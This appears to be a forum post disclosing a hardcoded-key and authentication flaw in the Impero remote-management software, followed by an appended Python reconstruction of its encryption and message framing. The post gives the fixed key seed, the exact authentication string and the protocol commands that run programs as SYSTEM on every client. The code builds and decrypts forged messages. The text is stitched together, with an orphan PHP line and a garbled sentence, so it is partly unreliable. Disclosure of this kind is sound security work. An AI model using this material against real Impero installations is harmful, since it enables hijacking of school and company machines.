
If you're unsure what Impero is, it's essentially a corporate/educational RAT.

They recently were in the news about how they implemented "anti-radicalisation" shit or something. They had a booth at BETT back in January. Unfortunately, when I asked about their security, nobody answered me. Some reversing later, looks like Impero is completely pwned amirite.

The proprietary Impero protocol on the wire is encrypted, but with a hardcoded key and IV that are both derived from sha512("Imp3ro"). ISO 10126 padding is used. Since the key and IV are the same for every install and come from a string sitting in the client binary, anyone who has the client can decrypt, replay or forge traffic; the encryption only stops a casual look at a pcap. After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". "PASSWORD" is a separate string though, so it might be different for some special clients maybe. Then we have full range to do whatever we want.

My PoC also does negotiation, but I'm not sure if that's needed. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run a CLI command as SYSTEM), or "OPENFILE" (visibly run an EXE under whatever user, including SYSTEM), or other protocol commands, etc. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it. There's an OSX version, but I haven't properly looked into that.

Basically, if you use Impero, please don't. internet censorship is, and so are any and all RATs.

$r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port)
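As an added example (this is not the post's PoC and not Impero's own code), here is a Python reconstruction of the wire layer exactly as the post describes it: key and IV from a single SHA-512 of "Imp3ro", ISO 10126 padding, and the "-1|AUTHENTICATE\x02PASSWORD" framing. Everything else is an assumption and is labelled as such in the code: that the cipher is AES-256-CBC, that the key is the first 32 bytes of the digest and the IV the next 16, that further arguments are also separated by \x02, and that the `cryptography` library is available. The `server_side_receive` and `first_block_is_deterministic` helpers are mine, added to show why a hardcoded key and IV buy nothing against anyone holding the client.

```python
import hashlib
import os

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

BLOCK = 16
SEED = b"Imp3ro"  # the fixed string the post says the key and IV are derived from


def derive_key_iv(seed=SEED):
    """Key and IV both come from one SHA-512 of a fixed string, so every
    install shares them. ASSUMPTION: AES-256 key = first 32 bytes of the
    digest, IV = the next 16 bytes (the post only says 'derived from')."""
    digest = hashlib.sha512(seed).digest()
    return digest[:32], digest[32:48]


def iso10126_pad(data):
    """ISO 10126: random filler bytes, last byte = pad length (1..16)."""
    n = BLOCK - (len(data) % BLOCK)
    return data + os.urandom(n - 1) + bytes([n])


def iso10126_unpad(data):
    """Only the final length byte is checked; the filler is random by design,
    so the decryptor cannot detect tampering in the filler bytes at all."""
    if not data or len(data) % BLOCK:
        raise ValueError("ciphertext length is not a block multiple")
    n = data[-1]
    if not 1 <= n <= BLOCK:
        raise ValueError("invalid padding length byte")
    return data[:-n]


def encrypt(plaintext, key, iv):
    # ASSUMPTION: AES-CBC; the post only says 'encrypted' with a hardcoded key/IV.
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return enc.update(iso10126_pad(plaintext)) + enc.finalize()


def decrypt(ciphertext, key, iv):
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    return iso10126_unpad(dec.update(ciphertext) + dec.finalize())


def build_message(client_id, command, *args):
    """'<id>|<COMMAND>\\x02<arg>' as in "-1|AUTHENTICATE\\x02PASSWORD".
    ASSUMPTION: any further arguments are separated by \\x02 as well."""
    body = f"{client_id}|{command}".encode()
    return body + b"".join(b"\x02" + a.encode() for a in args)


def parse_message(raw):
    """Inverse of build_message: (client_id, command, [args])."""
    head, _, rest = raw.partition(b"|")
    command, *args = rest.split(b"\x02")
    return head.decode(), command.decode(), [a.decode() for a in args]


def server_side_receive(ciphertext):
    """What the server sees, and equally what anyone holding the client
    binary sees: derive the same key/IV, decrypt, parse. No per-session
    secret is involved anywhere."""
    key, iv = derive_key_iv()
    return parse_message(decrypt(ciphertext, key, iv))


def first_block_is_deterministic(msg):
    """With a fixed IV, two encryptions of the same plaintext share every
    block up to the padding block; only the random filler differs. That
    makes the AUTHENTICATE message trivially recognisable in a capture."""
    key, iv = derive_key_iv()
    a, b = encrypt(msg, key, iv), encrypt(msg, key, iv)
    return a[:BLOCK] == b[:BLOCK]


if __name__ == "__main__":
    key, iv = derive_key_iv()
    auth = build_message("-1", "AUTHENTICATE", "PASSWORD")
    wire = encrypt(auth, key, iv)
    print(wire.hex())
    print(server_side_receive(wire))           # ('-1', 'AUTHENTICATE', ['PASSWORD'])
    print(first_block_is_deterministic(auth))  # True
```

The point for a defender is the last two helpers: with the key and IV fixed, a network sensor that knows the string can decrypt Impero traffic in bulk, and the crypto alone gives a client no way to tell a rogue server (or a rogue client, from the server's side) from the real one. Only the fixed-string derivation, the padding scheme and the AUTHENTICATE framing come from the post; swap the cipher or the digest slicing if your own reversing shows something different.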
